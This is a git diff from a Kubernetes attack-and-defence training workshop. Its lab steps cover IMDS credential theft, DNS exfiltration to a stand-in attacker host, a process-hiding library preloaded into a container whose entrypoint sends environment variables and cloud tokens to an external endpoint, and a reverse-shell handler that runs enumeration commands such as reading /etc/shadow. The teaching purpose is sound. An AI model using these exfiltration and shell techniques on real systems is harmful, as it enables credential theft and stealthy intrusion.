+TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
+curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+**Azure IMDS:**
+```
+curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
+```
+
+**Note:** In our kind lab, these endpoints won't be available (no cloud metadata service). On a real cloud VM (like the GCP one from lab setup), the GCP commands will work. The key takeaway: any pod with network access can potentially reach IMDS and steal cloud credentials.
+
+```
+exit
+```
+
+#### Blocking IMDS with Network Policies
+
+You can block IMDS access at the network level:
+
+```
+cat << 'EOF' | kubectl apply -f -
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: block-imds
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Egress
+ egress:
+ # Allow all egress EXCEPT the metadata IP
+ - to:
+ - ipBlock:
+ cidr: 0.0.0.0/0
+ except:
+ - 169.254.169.254/32
+EOF
+```
+
+### Exercise: DNS Exfiltration from "Isolated" Pods
+
+Even with strict network policies, DNS is almost always allowed (pods need it to resolve service names). This makes it an exfiltration channel.
+
+Apply the network policy demo manifests:
+```
+kubectl apply -f k8s-manifests/network-policy-demo.yaml
+```
+
+Exec into the network-policy test pod:
+```
+kubectl exec -it netpol-test-pod -n pls-dont-hack-me -- /bin/sh
+```
+
+Try a normal HTTP request (should fail with default-deny egress):
+```
+curl -s --max-time 5 http://example.com || echo "Blocked by network policy (expected)"
+```
+
+But DNS still works:
+```
+nslookup kubernetes.default.svc
+```
+
+Simulate DNS exfiltration — encode data as a DNS query:
+```
+nslookup $(echo "secret-data" | base64 | tr '+/' '-_').attacker.example.com 2>/dev/null || echo "DNS query sent (check your DNS server logs)"
+```
+
+The key insight: network policies that allow DNS (UDP/TCP 53) create an exfiltration channel. Mitigations include DNS-aware network policies (Cilium) or DNS monitoring.
+
+```
+exit
+```
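+
+The encoding step above can be sketched a bit more fully. Here's how an attacker packs arbitrary data into DNS-safe queries: base64url-encode it, then split it into chunks under DNS's 63-byte per-label limit (`attacker.example.com` is a placeholder; no real lookups are made here):
+```
+DATA="some secret we want to smuggle out over DNS"
+ENCODED=$(printf '%s' "$DATA" | base64 -w0 | tr '+/' '-_' | tr -d '=')
+# Each line below would become one DNS lookup in a real attack:
+for chunk in $(printf '%s' "$ENCODED" | fold -w 60); do
+    echo "${chunk}.attacker.example.com"
+done
+```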
+
+### Exercise: Managed K8s Attack Surfaces
+
+#### EKS: IRSA (IAM Roles for Service Accounts) Abuse
+
+In AWS EKS, pods can assume IAM roles through IRSA. The token is projected into the pod:
+```
+# On a real EKS cluster, you'd find these:
+# /var/run/secrets/eks.amazonaws.com/serviceaccount/token (OIDC token)
+# AWS_ROLE_ARN environment variable
+# AWS_WEB_IDENTITY_TOKEN_FILE environment variable
+```
+
+An attacker with pod access can use the projected token to assume the IAM role and access AWS services. The fix: use least-privilege IAM policies and Pod Identity (the newer replacement for IRSA).
+
+#### GKE: Workload Identity Federation
+
+In GKE, Workload Identity maps K8s service accounts to GCP service accounts:
+```
+# On a real GKE cluster with Workload Identity:
+curl -s -H "Metadata-Flavor: Google" \
+ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
+# Returns a GCP access token scoped to the mapped service account
+```
+
+The fix: use fine-grained IAM bindings and audit Workload Identity mappings.
+
+#### Cleanup
+
+```
+kubectl delete -f k8s-manifests/network-policy-demo.yaml
+kubectl delete -f k8s-manifests/imds-demo-pod.yaml
+```
+
+---
+
+## Appendix
+
+
+### Slide 161 - Exercise: Libprocess hider lab
+
+#### This lab was part of our original workshop, but eBPF and other changes, like observability tooling sitting outside the container's namespaces, have made it less relevant. That said, it's still a fun exercise and shows off some cool living-off-the-land (LoL) techniques for data exfil.
+
+Let's go back to our cmddemo Dockerfile
+```
+cd ~/imagetest
+```
+```
+git clone https://github.com/gianlucaborello/libprocesshider
+```
+```
+cd libprocesshider && vi processhider.c
+```
+
+Change this:
+```
+/*
+ * Every process with this name will be excluded
+ */
+static const char* process_to_filter = "evil_script.py";
+```
+to this (use `i` to enter insert mode in vi):
+```
+static const char* process_to_filter = "sleep";
+```
+> After changing, hit `[ESC]`, then type `:wq`
+
+Compile:
+```
+make
+```
+
+### Slide 162 - Libprocess hider lab (cont.)
+
+```
+cd ..
+```
+We're going to update the Dockerfile from our cmddemo to do more things
+```
+vi Dockerfile
+```
+We're going to add 4 new lines
+
+>Reminder about vi: `i` for insert mode to edit text, use arrow keys to navigate, `[ESC]` to exit insert mode, `:wq` to save(write to file) and quit
+
+Between these two lines
+```
+RUN apt update && apt upgrade -y && apt install -y curl tini
+COPY ./docker-entrypoint.sh /docker-entrypoint.sh
+```
+Add:
+```
+COPY ./libprocesshider/libprocesshider.so /usr/local/lib/libso5.so
+RUN echo "/usr/local/lib/libso5.so" >> /etc/ld.so.preload
+```
+This copies in the library we just compiled and adds an entry to `/etc/ld.so.preload`, so the dynamic linker preloads it into every process in the container.
+
+Between these two lines
+```
+ENV USER HANDLE
+ENTRYPOINT ["/usr/bin/tini", "--", "/docker-entrypoint.sh"]
+```
+add and replace PASSWORD with one you made up:
+```
+# Replace password with a unique one of your own
+ENV PW PASSWORD
+```
+
+When it's all done, your Dockerfile should look like this:
+
+```
+FROM ubuntu:22.04
+RUN groupadd -g 999 usertest && \
+useradd -r -u 999 -g usertest usertest
+RUN apt update && apt upgrade -y && apt install -y curl tini
+COPY ./libprocesshider/libprocesshider.so /usr/local/lib/libso5.so
+RUN echo "/usr/local/lib/libso5.so" >> /etc/ld.so.preload
+COPY ./docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+USER usertest
+# Go to pipedream.com and get an HTTP endpoint URL, replace below
+ENV URL PIPEDREAM_URL
+ENV UA "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7"
+# Replace HANDLE with your l33t hacker name or some other identifying designation
+ENV USER HANDLE
+# Replace password with a unique one of your own
+ENV PW PASSWORD
+ENTRYPOINT ["/usr/bin/tini", "--", "/docker-entrypoint.sh"]
+```
+> After pasting, hit `[ESC]`, then type `:wq`
+
+### Slide 163 - Libprocess hider lab (cont.)
+
+>`[ESC]` then type `:wq` if you haven't already from last slide
+
+We're also going to edit the docker-entrypoint.sh file; it's easier to just replace the whole thing.
+```
+vi docker-entrypoint.sh
+```
+
+>vi Tip: just hit `dd` repeatedly to delete whole lines, then go into insert mode and paste the contents below
+```
+#!/usr/bin/env bash
+
+if [ "shell" = "${1}" ]; then
+ /bin/bash
+else
+ while true
+ do
+ sleep 30
+    curl -s -X POST -A "${UA}" -H "X-User: ${USER}" -H "Cookie: `uname -a | gzip | base64 -w0`" -d \
+`{ env && curl -s -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token; } | gzip | openssl enc -e -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | base64 -w0` \
+$URL
+ echo
+ done
+fi
+```
+
+This adds a little more data to our exfil, we'll go over this.
+
+> After pasting, hit `[ESC]`, then type `:wq`
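+
+If you want to see what this pipeline produces before running the container, here's a local round trip of the encrypt/encode stages and the matching decode (the password and payload below are stand-ins):
+```
+PW="demo-password"
+PAYLOAD="USER=demo HOSTNAME=test-pod"
+# Encode stage, the same pipeline the entrypoint script uses:
+BLOB=$(printf '%s' "$PAYLOAD" | gzip | openssl enc -e -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | base64 -w0)
+# Decode stage, the same commands you'll run against the captured data later:
+printf '%s' "$BLOB" | base64 -d | openssl enc -d -aes-256-cbc -md sha512 -pbkdf2 -a -salt -pass "pass:${PW}" | gunzip
+```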
+
+### Slide 164 - Libprocess hider lab (cont.)
+
+>`[ESC]` then type `:wq` if you haven't already from last slide
+
+Rebuild the container
+```
+docker build -t cmddemo .
+```
+
+Run the container in the background (detached) and just print the container id (`-d` aka `--detach`)
+```
+docker run -d cmddemo
+```
+
+After 30 seconds, you should see a new request on your Pipedream endpoint (that hopefully you kept open). If not, create a new endpoint on Pipedream, re-edit your Dockerfile, replace the environment variable value with the new one, rebuild, and re-run the container.
+
+### Slide 165 - Libprocess hider lab (cont.)
+
+Decrypt and decode the new data in the raw output of the Pipedream request that came in. Replace `[DATA]` with the base64 string from it in the command below. Don't forget to replace `[strong password]` in the command below with the one you set in the Dockerfile.
+
+Enter the commands below as three separate lines; do not hit `[ENTER]` until you've replaced `[DATA]` and the password.
+**Use the clipboard function for these commands with the trailing `\`, otherwise the terminal will hit return before you're ready.**
+
+```
+base64 -d <<< [DATA] \
+```
+```
+| openssl enc -d -aes-256-cbc -md sha512 -pbkdf2 -a -salt -pass "pass:[strong password]" \
+```
+```
+| gunzip
+```
+
+What do you see? Why would this information be useful to an attacker?
+
+Let's test out the libprocesshider
+
+```
+docker ps
+```
+Use the container id/name to replace `[container name/id]` in the command below
+```
+docker exec [container name/id] ps auxf
+```
+Where's the sleep process?
+
+Run the process list outside the container/namespace.
+```
+ps auxf | grep systemd
+```
+There it is. Why isn't it hiding the process outside the namespace?
+
+Stop the container (running in background) now that we're done with it.
+```
+docker stop [container name/id]
+```
+
+
+### Slide 178 - Complex Microservices app demo
+
+You can run this in your lab cluster.
+
+```
+kubectl create -f https://raw.githubusercontent.com/microservices-demo/microservices-demo/master/deploy/kubernetes/complete-demo.yaml
+```
+
+```
+kubectl get deployments -n sock-shop
+```
+
+```
+kubectl get replicasets -n sock-shop
+```
+
+### Slide XXX - Accessing services running in containers
+
+Start up a web service without exposing it externally (i.e. no `-p 80:80`); it will only be reachable locally via the bridge interface
+
+```
+docker run --name=netwebserver -d nginx
+```
+
+Get the IP of the bridge interface
+
+```
+docker inspect -f "{{ .NetworkSettings.IPAddress }}" netwebserver
+```
+
+Access the service from the host machine through the bridge interface
+
+```
+curl http://[IP]
+```
+
+Clean up
+
+```
+docker stop netwebserver
+```
+
+### Slide XXX - Incident response exercise
+
+```
+openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=XX/ST=AZ/L=Mesa/O=CactusCon/OU=Malicious Kubernetes/CN=localhost"
+```
+
+```
+python scripts/reverse_shell_handler.py
+```
+
+In another window/terminal, run:
+```
+kubectl apply -f k8s-manifests/attacker-pod.yaml
+```
+
+### Slide XXX - Create side-car pod, test nginx, and remove pod (run in conjunction with babby's first pod)
+
+```
+kubectl run -it shell-container --image=alpine/curl:8.11.1 /bin/ash --namespace lab-namespace
+```
+
+Get IP from pod description
+
+```
+curl http://[IP]
+```
+
+```
+exit
+```
+
+```
+kubectl delete pod shell-container --namespace lab-namespace
+```
+
+
+### Slide XXX - Using curl to interact with Kubernetes API Server
+
+Kubernetes mounts the token info for service accounts inside the container to make it available for use
+
+```
+kubectl run -it shell-container --image=alpine/curl:8.11.1 /bin/ash --namespace lab-namespace
+```
+
+From inside a container in a pod with an attached service account
+
+```
+cd /run/secrets/kubernetes.io/serviceaccount && ls -l
+```
+
+Set the namespace as well
+```
+NAMESPACE=lab-namespace
+```
+
+Optionally, assign the token to a variable for later
+```
+TOKEN=$(cat token)
+```
+
+Now make the API request with curl (or some other HTTP tool):
+
+```
+curl --cacert ca.crt \
+-H "Authorization: Bearer $(cat token)" \
+https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods
+```
+
+`ca.crt` and the token are all provided in the /run/secrets/kubernetes.io/serviceaccount directory. We read the token straight from the file and inserted it into the curl command above. Likewise, Kubernetes' internal DNS resolves `kubernetes.default.svc` to the API server IP for you.
+
+You'll get a JSON response back that you can parse yourself.
+
+Most likely it was a Forbidden response, but it did tell you what rights you need. We could create a whole new service account and assign it to the pod (the proper way), but to save time we'll just grant rights to the current account. Open a new terminal to the server.
+
+```
+kubectl create role pod-reader --verb=get --verb=list --verb=watch --resource=pods --namespace lab-namespace
+```
+
+```
+kubectl create rolebinding lab-namespace-default-pod-reader --role pod-reader --serviceaccount=lab-namespace:default --namespace lab-namespace
+```
+
+Exit/close this window. Back in the other window:
+
+```
+kubectl attach shell-container -c shell-container -i -t -n lab-namespace
+```
+
+```
+cd /run/secrets/kubernetes.io/serviceaccount && NAMESPACE=lab-namespace
+```
+
+```
+curl --cacert ca.crt \
+-H "Authorization: Bearer $(cat token)" \
+https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods
+```
+
+Now you should see a full response, at least including the pod you're running in.
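The `alpine/curl` image doesn't ship `jq`, so here is one way to pull pod names out of the response with plain `grep` and `cut`; the sample below is an abridged, made-up PodList body:

```shell
# Abridged sample of a PodList response (hypothetical contents)
RESPONSE='{"kind":"PodList","items":[{"metadata":{"name":"shell-container","namespace":"lab-namespace"}}]}'

# Extract every "name" value; with one pod, that is the pod's name
echo "$RESPONSE" | grep -o '"name":"[^"]*"' | cut -d'"' -f4
```

Where `jq` is available, `.items[].metadata.name` does the same thing more robustly.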
+
+You can exit the pod and, if you want to clean up, delete the shell-container pod.
+
+```
+kubectl delete pod shell-container -n lab-namespace
+```
diff --git a/current/scripts/reverse_shell_handler.py b/current/scripts/reverse_shell_handler.py
new file mode 100644
index 0000000..bdfdab0
--- /dev/null
+++ b/current/scripts/reverse_shell_handler.py
@@ -0,0 +1,78 @@
+from twisted.internet import ssl, reactor
+from twisted.internet.protocol import Protocol, Factory
+
+enum_commands = ['whoami','id','hostname','cat /etc/passwd', 'cat /etc/shadow', 'cat /etc/group','ls -l ~/.ssh/','sudo -l','ps aux','uname -a','env','cat /run/secrets/kubernetes.io/serviceaccount/token','cat /var/run/secrets/kubernetes.io/serviceaccount/token','cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt','strace ls']
+# Reverse enumeration commands so that the commands are sent in order when popped off the stack
+enum_commands.reverse()
+
+
+# Twisted is an event-driven networking engine for Python, licensed under the MIT license.
+#
+# Protocol is the base class for Twisted networking protocols. It defines the
+# basic interface between transports and higher-level protocols, and it
+# implements twisted.internet.interfaces.IProtocol. Subclass it and override
+# these callbacks to define a protocol's behavior:
+#   makeConnection: called when a connection is made.
+#   dataReceived:   called whenever data is received.
+#   connectionLost: called when the connection is shut down.
+#
+# See https://twistedmatrix.com/documents/current/api/twisted.internet.protocol.Protocol.html
+# for more information on the Protocol class.
+
+
+
+class SSLProtocol(Protocol):
+
+ # initialize the enumeration commands
+
+ def __init__(self):
+ # Make a copy of the enumeration commands
+ self.enum_commands = enum_commands.copy()
+
+ def connectionMade(self):
+ print('Connection made')
+
+
+    def dataReceived(self, data):
+        # print('Received:', data.decode())
+        # Wait until a shell prompt ('$ ') is received from the client
+        if data.decode(errors='replace').endswith('$ '):
+            # If there are no more enumeration commands, exit the shell
+            if len(self.enum_commands) == 0:
+                self.send_command('exit\n')
+                self.transport.loseConnection()
+            else:
+                # Send the next enumeration command
+                command = self.enum_commands.pop() + '\n'
+                self.send_command(command)
+
+ def send_command(self, command):
+ self.transport.write(command.encode())
+ print('Sent:', command)
+
+class SSLServerFactory(Factory):
+ def buildProtocol(self, addr):
+ return SSLProtocol()
+
+
+
+def main():
+ # Set the server address and port
+ server_address = ('0.0.0.0', 4443)
+ # Load server's certificate and private key
+ with open('cert.pem', 'rb') as cert_file, open('key.pem', 'rb') as key_file:
+ certificate = ssl.PrivateCertificate.loadPEM(cert_file.read() + key_file.read())
+
+ # Create and start SSL server
+ factory = SSLServerFactory()
+ reactor.listenSSL(server_address[1], factory, certificate.options())
+ print(f'SSL server running on {server_address[0]}:{server_address[1]}')
+ reactor.run()
+
+
+if __name__ == "__main__":
+ main()
+
diff --git a/current/scripts/verify-setup.sh b/current/scripts/verify-setup.sh
new file mode 100644
index 0000000..4ccf8c5
--- /dev/null
+++ b/current/scripts/verify-setup.sh
@@ -0,0 +1,216 @@
+#!/usr/bin/env bash
+# verify-setup.sh - Smoke test script for Malicious Kubernetes Workshop lab setup
+# Run this after completing lab setup to verify all tools and services are working.
+
+set -euo pipefail
+
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+YELLOW='\033[1;33m'
+NC='\033[0m' # No Color
+
+PASS=0
+FAIL=0
+WARN=0
+
+pass() {
+    echo -e "  ${GREEN}[PASS]${NC} $1"
+    PASS=$((PASS + 1))  # ((PASS++)) would return non-zero when PASS is 0 and trip set -e
+}
+
+fail() {
+    echo -e "  ${RED}[FAIL]${NC} $1"
+    FAIL=$((FAIL + 1))
+}
+
+warn() {
+    echo -e "  ${YELLOW}[WARN]${NC} $1"
+    WARN=$((WARN + 1))
+}
+
+check_command() {
+ local cmd=$1
+ local expected_version=${2:-""}
+ if command -v "$cmd" &> /dev/null; then
+ local version
+        # Chain the fallbacks before piping: a pipeline's exit status comes from head, not $cmd
+        version=$({ "$cmd" version 2>/dev/null || "$cmd" --version 2>/dev/null || echo "installed"; } | head -1)
+ if [ -n "$expected_version" ]; then
+ if echo "$version" | grep -q "$expected_version"; then
+ pass "$cmd ($version)"
+ else
+ warn "$cmd installed but version mismatch (got: $version, expected: $expected_version)"
+ fi
+ else
+ pass "$cmd ($version)"
+ fi
+ else
+ fail "$cmd not found in PATH"
+ fi
+}
+
+echo "=========================================="
+echo " Malicious Kubernetes Workshop"
+echo " Setup Verification"
+echo "=========================================="
+echo ""
+
+# --- Section 1: Core Tools ---
+echo "--- Core Tools ---"
+check_command docker
+check_command kubectl "v1.31"
+check_command kind "v0.27"
+check_command helm "v3.16"
+check_command ansible
+check_command jq
+check_command ngrok
+
+# --- Section 2: Supply Chain Tools ---
+echo ""
+echo "--- Supply Chain Tools ---"
+check_command cosign
+check_command crane
+check_command syft
+check_command grype
+
+# --- Section 3: Docker ---
+echo ""
+echo "--- Docker ---"
+if docker info &> /dev/null; then
+ pass "Docker daemon is running"
+else
+ fail "Docker daemon is not running (try: sudo systemctl start docker)"
+fi
+
+if groups | grep -qw docker; then
+ pass "Current user is in docker group"
+else
+ warn "Current user is NOT in docker group (you may need sudo for docker commands)"
+fi
+
+# --- Section 4: Kind Cluster ---
+echo ""
+echo "--- Kind Cluster ---"
+if kind get clusters 2>/dev/null | grep -qx "lab"; then
+ pass "Kind cluster 'lab' exists"
+else
+ warn "Kind cluster 'lab' not found (run: kind create cluster --config=kind-lab-config.yaml)"
+fi
+
+if kubectl cluster-info --context kind-lab &> /dev/null; then
+ pass "kubectl can reach kind-lab cluster"
+
+ # Check nodes
+ NODE_COUNT=$(kubectl get nodes --no-headers 2>/dev/null | wc -l)
+ if [ "$NODE_COUNT" -ge 3 ]; then
+ pass "Cluster has $NODE_COUNT nodes (expected 3: 1 control-plane + 2 workers)"
+ else
+ warn "Cluster has $NODE_COUNT nodes (expected 3)"
+ fi
+
+ # --- Section 5: K8s Resources ---
+ echo ""
+ echo "--- K8s Resources ---"
+ if kubectl get namespace pls-dont-hack-me &> /dev/null; then
+ pass "Namespace 'pls-dont-hack-me' exists"
+ else
+ warn "Namespace 'pls-dont-hack-me' not found (run: ansible-playbook k8s-ansible-setup.yaml)"
+ fi
+
+ if kubectl get namespace monitoring &> /dev/null; then
+ pass "Namespace 'monitoring' exists"
+ else
+ warn "Namespace 'monitoring' not found"
+ fi
+
+ if kubectl get namespace tracee-system &> /dev/null; then
+ pass "Namespace 'tracee-system' exists"
+ else
+ warn "Namespace 'tracee-system' not found"
+ fi
+
+ # --- Section 6: Helm Releases ---
+ echo ""
+ echo "--- Helm Releases ---"
+ for release in kind-prometheus promtail loki tracee; do
+ if helm list --all-namespaces 2>/dev/null | grep -q "$release"; then
+ pass "Helm release '$release' is deployed"
+ else
+ warn "Helm release '$release' not found"
+ fi
+ done
+
+ for release in falco tetragon; do
+ if helm list --all-namespaces 2>/dev/null | grep -q "$release"; then
+ pass "Helm release '$release' is deployed"
+ else
+ warn "Helm release '$release' not found (new tool — run k8s-ansible-setup if not yet deployed)"
+ fi
+ done
+
+ # --- Section 7: Key Pods ---
+ echo ""
+ echo "--- Key Pods ---"
+ if kubectl get pods -n monitoring --no-headers 2>/dev/null | grep -q "Running"; then
+ pass "Monitoring pods are running"
+ else
+ warn "No running pods in monitoring namespace"
+ fi
+
+ if kubectl get pods -n tracee-system --no-headers 2>/dev/null | grep -q "Running"; then
+ pass "Tracee pods are running"
+ else
+ warn "Tracee pods not running"
+ fi
+
+ # --- Section 8: Developer Context ---
+ echo ""
+ echo "--- Contexts ---"
+ if kubectl config get-contexts 2>/dev/null | grep -q "developer@kind-lab"; then
+ pass "Developer context configured"
+ else
+ warn "Developer context not configured (set up by k8s-ansible-setup)"
+ fi
+else
+ warn "Cannot reach kind-lab cluster (cluster may not be created yet)"
+fi
+
+# --- Section 9: Container Image Pull Test ---
+echo ""
+echo "--- Image Pull Test ---"
+for image in "ubuntu:22.04" "alpine/curl:8.11.1" "bkimminich/juice-shop"; do
+ if docker pull "$image" &> /dev/null; then
+ pass "Can pull $image"
+ else
+ fail "Cannot pull $image"
+ fi
+done
+
+# --- Section 10: ngrok ---
+echo ""
+echo "--- ngrok ---"
+if ngrok config check &> /dev/null; then
+ pass "ngrok config is valid"
+else
+ if [ -f "$HOME/.config/ngrok/ngrok.yml" ] || [ -f "$HOME/.ngrok2/ngrok.yml" ]; then
+ pass "ngrok config file exists"
+ else
+        warn "ngrok authtoken not configured (run: ngrok config add-authtoken <token>)"
+ fi
+fi
+
+# --- Summary ---
+echo ""
+echo "=========================================="
+echo " Results: ${GREEN}${PASS} passed${NC}, ${RED}${FAIL} failed${NC}, ${YELLOW}${WARN} warnings${NC}"
+echo "=========================================="
+
+if [ "$FAIL" -gt 0 ]; then
+ echo -e "${RED}Some checks failed. Review the output above and fix issues before starting the workshop.${NC}"
+ exit 1
+elif [ "$WARN" -gt 0 ]; then
+ echo -e "${YELLOW}Some warnings — the lab may still work, but review the output above.${NC}"
+ exit 0
+else
+ echo -e "${GREEN}All checks passed! Lab is ready.${NC}"
+ exit 0
+fi